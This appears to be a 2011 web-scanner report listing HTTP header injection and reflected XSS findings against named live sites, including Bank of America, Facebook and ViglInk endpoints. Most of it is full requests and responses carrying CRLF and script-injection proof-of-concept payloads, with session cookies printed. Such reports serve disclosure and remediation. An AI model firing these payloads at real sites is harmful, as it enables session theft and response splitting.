HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload e98b7%0d%0a72138907069 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2171139&PluID=0&w=728&h=90&ord=[timestamp]&ucm=true HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://thehill.com/blogs/e2-wire/677-e2-wire650aa'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2295b33377e/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u3=1; C4=; A3=f+JvabEk02WG00002h5iUabNz07l00000Qh5j3abNz07l00000.gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001fUFGa50V02WG00001gy3.ach00c9M00001cRreabeg03Dk00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001ge4Hack+0bM000001; B3=7lgH0000000001sG89PS000000000QsZ89PT000000000.sZ852G0000000003sS7dNH0000000002sZ7GHq0000000001s.7FCH0000000001s.83xP0000000001sF8cVQ0000000001sV852N0000000001s.87ma0000000001s.6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; eyeblaster=BWVal=408&BWDate=40573.510532&debuglevel=&FLV=10.1103&RES=128&WMPV=0e98b7%0d%0a72138907069; ActivityInfo=000p81bBo%5f; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g
The value of REST URL parameter 3 is copied into the Location response header. The payload 44609%0d%0a823a43cd739 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/44609%0d%0a823a43cd739 HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 02 Feb 2011 22:10:48 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=6B551B6EF292368753CEA0B23B3B8F3A.ftb-web4; Path=/locator/locator P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/44609 823a43cd739?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 1 is copied into the Location response header. The payload 49dfd%0d%0ab7061f6f456 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /49dfd%0d%0ab7061f6f456/worldnews/worldnews.asp HTTP/1.1 Host: www.fis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Server: Microsoft-IIS/5.0 Date: Thu, 03 Feb 2011 01:52:12 GMT Connection: close Location: /fis/error/error.asp?404;http://www.fis.com/49dfd b7061f6f456/worldnews/worldnews.asp
The value of REST URL parameter 2 is copied into the Location response header. The payload d412c%0d%0ad95cbc5e854 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /fis/d412c%0d%0ad95cbc5e854/worldnews.asp HTTP/1.1 Host: www.fis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Server: Microsoft-IIS/5.0 Date: Thu, 03 Feb 2011 01:52:17 GMT Connection: close Location: /fis/error/error.asp?404;http://www.fis.com/fis/d412c d95cbc5e854/worldnews.asp
2. Cross-site scripting (reflected)previous There are 182 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the shifth request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 66993%3balert(1)//766c94fef6e was submitted in the shifth parameter. This input was echoed as 66993;alert(1)//766c94fef6e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/delivery/al.php?zoneid=113&cb=INSERT_RANDOM_NUMBER_HERE&layerstyle=simple&align=center&valign=middle&padding=2&closetime=8&padding=2&shifth=066993%3balert(1)//766c94fef6e&shiftv=0&closebutton=t&backcolor=FFFFFF&bordercolor=000000 HTTP/1.1 Host: ad.thehill.com Proxy-Connection: keep-alive Referer: http://thehill.com/blogs/e2-wire/677-e2-wire650aa'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2295b33377e/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAID=308f74733f72a0ba99b5c2e36e2aaec4
Response
HTTP/1.1 200 OK X-Powered-By: PHP/5.1.6 Pragma: no-cache Cache-Control: private, max-age=0, no-cache Date: Thu, 03 Feb 2011 01:32:17 GMT Content-type: application/x-javascript P3P: CP="CUR ADM OUR NOR STA NID" Set-Cookie: OAID=308f74733f72a0ba99b5c2e36e2aaec4; expires=Fri, 03-Feb-2012 01:32:17 GMT; path=/ Server: lighttpd/1.4.22 Content-Length: 4484
The value of the shiftv request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 7de03%3balert(1)//1688d5789ce was submitted in the shiftv parameter. This input was echoed as 7de03;alert(1)//1688d5789ce in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/delivery/al.php?zoneid=113&cb=INSERT_RANDOM_NUMBER_HERE&layerstyle=simple&align=center&valign=middle&padding=2&closetime=8&padding=2&shifth=0&shiftv=07de03%3balert(1)//1688d5789ce&closebutton=t&backcolor=FFFFFF&bordercolor=000000 HTTP/1.1 Host: ad.thehill.com Proxy-Connection: keep-alive Referer: http://thehill.com/blogs/e2-wire/677-e2-wire650aa'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2295b33377e/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAID=308f74733f72a0ba99b5c2e36e2aaec4
Response
HTTP/1.1 200 OK X-Powered-By: PHP/5.1.6 Pragma: no-cache Cache-Control: private, max-age=0, no-cache Date: Thu, 03 Feb 2011 01:32:12 GMT Content-type: application/x-javascript P3P: CP="CUR ADM OUR NOR STA NID" Set-Cookie: OAID=308f74733f72a0ba99b5c2e36e2aaec4; expires=Fri, 03-Feb-2012 01:32:12 GMT; path=/ Server: lighttpd/1.4.22 Content-Length: 4484
The value of the method request parameter is copied into the HTML document as plain text between tags. The payload 6c818<img%20src%3da%20onerror%3dalert(1)>15cd25761cc was submitted in the method parameter. This input was echoed as 6c818<img src=a onerror=alert(1)>15cd25761cc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /restserver.php?v=1.0&method=links.getStats6c818<img%20src%3da%20onerror%3dalert(1)>15cd25761cc&urls=%5B%22http%3A%2F%2Fnews.change.org%2Fstories%2Fnobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi%23share_source%3Dblog-top_fb%22%5D&format=json&callback=fb_sharepro_render HTTP/1.1 Host: api.facebook.com Proxy-Connection: keep-alive Referer: http://news.change.org/stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi?7bf2b%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E36bc7e08caf=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; datr=8CJHTYhjyotVYfKpZ5B35lnF
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Content-Type: text/javascript;charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache X-Cnection: close Date: Thu, 03 Feb 2011 01:33:00 GMT Content-Length: 427
The value of the urls request parameter is copied into the HTML document as plain text between tags. The payload 7250b<img%20src%3da%20onerror%3dalert(1)>3afeaa161d5 was submitted in the urls parameter. This input was echoed as 7250b<img src=a onerror=alert(1)>3afeaa161d5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fnews.change.org%2Fstories%2Fnobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi%23share_source%3Dblog-top_fb%22%5D7250b<img%20src%3da%20onerror%3dalert(1)>3afeaa161d5&format=json&callback=fb_sharepro_render HTTP/1.1 Host: api.facebook.com Proxy-Connection: keep-alive Referer: http://news.change.org/stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi?7bf2b%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E36bc7e08caf=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; datr=8CJHTYhjyotVYfKpZ5B35lnF
Response
HTTP/1.1 200 OK Cache-Control: public, max-age=120 Content-Type: text/javascript;charset=utf-8 Expires: Wed, 02 Feb 2011 17:35:11 -0800 Pragma: X-Cnection: close Date: Thu, 03 Feb 2011 01:33:11 GMT Content-Length: 443
fb_sharepro_render({"error_code":114,"error_msg":"param urls must be an array.","request_args":[{"key":"v","value":"1.0"},{"key":"method","value":"links.getStats"},{"key":"urls","value":"[\"http:\/\/news.change.org\/stories\/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi#share_source=blog-top_fb\"]7250b<img src=a onerror=alert(1)>3afeaa161d5"},{"key":"format","value":"json"},{"key":"callback","value":"fb_sharepro_render"}]});
The value of the format request parameter is copied into the HTML document as plain text between tags. The payload 9ff8c<script>alert(1)</script>d0cbfd0ba59 was submitted in the format parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /api/click?format=jsonp9ff8c<script>alert(1)</script>d0cbfd0ba59&key=4f085ab2452b05f4c24c6b37dbc58a3b&loc=http%3A%2F%2Fcommunity.invisionpower.com%2Ftopic%2F330971-ipnexus-113-released%2Fpage__pid__2073390%23entry2073390&subId=d59e71895dde9e0dbe7525217bd974&v=1&libid=1296685545288&out=http%3A%2F%2Fwww.invisionpower.com%2Fproducts%2Fnexus%2F&ref=http%3A%2F%2Fcommunity.invisionpower.com%2F&title=IP.Nexus%201.1.3%20Released%20-%20Invision%20Power%20Services&txt=IP.Nexus%20application&jsonp=vglnk_jsonp_12966856382491 HTTP/1.1 Host: api.viglink.com Proxy-Connection: keep-alive Referer: http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__pid__2073390 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: vglnk.Agent.p=412aef8ac4db8eca6d18ab69d3a4b53c
Response
HTTP/1.1 400 Bad Request Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/plain Date: Wed, 02 Feb 2011 23:58:36 GMT Expires: Sat, 06 May 1995 12:00:00 GMT Pragma: no-cache Content-Length: 71 Connection: keep-alive
The value of the jsonp request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e7c41%3balert(1)//89d5419dbd6 was submitted in the jsonp parameter. This input was echoed as e7c41;alert(1)//89d5419dbd6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /api/click?format=jsonp&key=4f085ab2452b05f4c24c6b37dbc58a3b&loc=http%3A%2F%2Fcommunity.invisionpower.com%2Ftopic%2F330971-ipnexus-113-released%2Fpage__pid__2073390%23entry2073390&subId=d59e71895dde9e0dbe7525217bd974&v=1&libid=1296685545288&out=http%3A%2F%2Fwww.invisionpower.com%2Fproducts%2Fnexus%2F&ref=http%3A%2F%2Fcommunity.invisionpower.com%2F&title=IP.Nexus%201.1.3%20Released%20-%20Invision%20Power%20Services&txt=IP.Nexus%20application&jsonp=vglnk_jsonp_12966856382491e7c41%3balert(1)//89d5419dbd6 HTTP/1.1 Host: api.viglink.com Proxy-Connection: keep-alive Referer: http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__pid__2073390 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: vglnk.Agent.p=412aef8ac4db8eca6d18ab69d3a4b53c
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/javascript Date: Wed, 02 Feb 2011 23:58:43 GMT Expires: Sat, 06 May 1995 12:00:00 GMT Pragma: no-cache Content-Length: 102 Connection: keep-alive
The value of the out request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 875ad'%3balert(1)//6f691d8d147 was submitted in the out parameter. This input was echoed as 875ad';alert(1)//6f691d8d147 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /api/click?format=jsonp&key=4f085ab2452b05f4c24c6b37dbc58a3b&loc=http%3A%2F%2Fcommunity.invisionpower.com%2Ftopic%2F330971-ipnexus-113-released%2Fpage__pid__2073390%23entry2073390&subId=d59e71895dde9e0dbe7525217bd974&v=1&libid=1296685545288&out=http%3A%2F%2Fwww.invisionpower.com%2Fproducts%2Fnexus%2F875ad'%3balert(1)//6f691d8d147&ref=http%3A%2F%2Fcommunity.invisionpower.com%2F&title=IP.Nexus%201.1.3%20Released%20-%20Invision%20Power%20Services&txt=IP.Nexus%20application&jsonp=vglnk_jsonp_12966856382491 HTTP/1.1 Host: api.viglink.com Proxy-Connection: keep-alive Referer: http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__pid__2073390 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: vglnk.Agent.p=412aef8ac4db8eca6d18ab69d3a4b53c
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/javascript Date: Wed, 02 Feb 2011 23:58:38 GMT Expires: Sat, 06 May 1995 12:00:00 GMT Pragma: no-cache Content-Length: 103 Connection: keep-alive
The value of the out request parameter is copied into the HTML document as plain text between tags. The payload 89bf8<script>alert(1)</script>0d35527ef71 was submitted in the out parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /api/click?format=jsonp&key=4f085ab2452b05f4c24c6b37dbc58a3b&loc=http%3A%2F%2Fcommunity.invisionpower.com%2Ftopic%2F330971-ipnexus-113-released%2Fpage__pid__2073390%23entry2073390&subId=d59e71895dde9e0dbe7525217bd974&v=1&libid=1296685545288&out=89bf8<script>alert(1)</script>0d35527ef71&ref=http%3A%2F%2Fcommunity.invisionpower.com%2F&title=IP.Nexus%201.1.3%20Released%20-%20Invision%20Power%20Services&txt=IP.Nexus%20application&jsonp=vglnk_jsonp_12966856382491 HTTP/1.1 Host: api.viglink.com Proxy-Connection: keep-alive Referer: http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__pid__2073390 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: vglnk.Agent.p=412aef8ac4db8eca6d18ab69d3a4b53c
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/javascript Date: Wed, 02 Feb 2011 23:58:41 GMT Expires: Sat, 06 May 1995 12:00:00 GMT Pragma: no-cache Content-Length: 72 Connection: keep-alive
The value of the key request parameter is copied into the HTML document as plain text between tags. The payload 4b46b<script>alert(1)</script>e43aee83162 was submitted in the key parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /api/ping?format=jsonp&key=4f085ab2452b05f4c24c6b37dbc58a3b4b46b<script>alert(1)</script>e43aee83162&loc=http%3A%2F%2Fcommunity.invisionpower.com%2Ftopic%2F330971-ipnexus-113-released%2Fpage__pid__2073390%23entry2073390&subId=d59e71895dde9e0dbe7525217bd974&v=1&jsonp=vglnk_jsonp_12966856066450 HTTP/1.1 Host: api.viglink.com Proxy-Connection: keep-alive Referer: http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__pid__2073390 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: vglnk.Agent.p=412aef8ac4db8eca6d18ab69d3a4b53c
Response
HTTP/1.1 500 Internal Server Error Cache-Control: no-store, no-cache, must-revalidate Content-Language: en Content-Type: text/html;charset=ISO-8859-1 Date: Wed, 02 Feb 2011 22:26:57 GMT Expires: Sat, 06 May 1995 12:00:00 GMT Pragma: no-cache Vary: Accept-Encoding Connection: keep-alive Content-Length: 97
error: Unknown api key: 4f085ab2452b05f4c24c6b37dbc58a3b4b46b<script>alert(1)</script>e43aee83162
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42e41</script><script>alert(1)</script>a2217655438 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs42e41</script><script>alert(1)</script>a2217655438= HTTP/1.1 Host: arbor.custhelp.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cp_session=aUIUK5KMoF8afUrgJZXdnTjniX2eWSZxWh5wv4GsY1ETUucC0FSvrROU8rzFkSGH8ELvaWUESkFC7%7Ev2PKLcBoiib8DDn%7ET5K79FiThCqZvWeIJzw%7EkKsc0RNJHwnC47I3alT3AmrYr294Neqg0ltc9a3jcYBEfhFtH_DnGuIoUoqAvOf7rsP3oslXQY8lCo467qU8ITfv3vk0rrLEiVzJNz_p8A0Sf_kPsKHlwQO%7EVpVXIOzbcOMScUl8xnVTcCL3VtvckKO5XaK6r%7ELoe8W81%7E5k2bopUsy5_eW9GqqNRQoWbjAXA3_1RnJSytEve0Fd0KnSwcw8di6mpfxHlh4avqlSSRAFAb6m7dwm7faRO3vz2AQezeyleg%21%21
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:42:03 GMT Server: Apache P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV" Cache-Control: no-cache Expires: -1 Pragma: no-cache Set-Cookie: cp_session=aUx6oW8tRuC50eDPRl97npFuaGOMHZn11NBeN10rkeSZPQgfvVRx_vSuEVGvGk0mz1YIl66klbzDAz4DZ182Z1g2kuAlaPwudchWaGV0lrblKY0vtyrTDDdJ79GQdJGzc8AyEa7pPjYaY2Zu0yuUACJsF%7EJtE%7EioMbnns6N4y50a8cshftqy6qCLau3o8Zwemiu0KpfY0iRiilrQMFwJWssTx%7EYINE1554YiykSPZP7F0IBDazYu6U3ycZMVMfr0QLbP5KPEGQ_vEeZLeda09%7EVPWRykFc8y_ukjAbGNAMFht1JGBgjah0G2TUgQ0nSW75STNcK4H4AQoYJV7UCGSR79sTFZIQONMSPahHDaYJfXgZKzZxTmdV_GJ8hU5tlHR04ytmnxPNqwFRehwSL0RTPnZG3thL%7EVHjHZV56Eb_V85eqHkXObQD0Zm0p10961KoojryKWDSFgzM2niBSNac0fLu7K4LulL54z_WGQJduoFwvteqHRIwoYdAobOou2EW%7ExQ4oFScfPE%21; path=/; httponly RNT-Time: D=118859 t=1296697323108634 RNT-Machine: 01 F5_do_compression: yes Keep-Alive: timeout=15, max=87 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 25359
2.11. https://arbor.custhelp.com/app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs= [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3aa72</script><script>alert(1)</script>2ea59d67104 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs=?3aa72</script><script>alert(1)</script>2ea59d67104=1 HTTP/1.1 Host: arbor.custhelp.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cp_session=aUIUK5KMoF8afUrgJZXdnTjniX2eWSZxWh5wv4GsY1ETUucC0FSvrROU8rzFkSGH8ELvaWUESkFC7%7Ev2PKLcBoiib8DDn%7ET5K79FiThCqZvWeIJzw%7EkKsc0RNJHwnC47I3alT3AmrYr294Neqg0ltc9a3jcYBEfhFtH_DnGuIoUoqAvOf7rsP3oslXQY8lCo467qU8ITfv3vk0rrLEiVzJNz_p8A0Sf_kPsKHlwQO%7EVpVXIOzbcOMScUl8xnVTcCL3VtvckKO5XaK6r%7ELoe8W81%7E5k2bopUsy5_eW9GqqNRQoWbjAXA3_1RnJSytEve0Fd0KnSwcw8di6mpfxHlh4avqlSSRAFAb6m7dwm7faRO3vz2AQezeyleg%21%21
Response
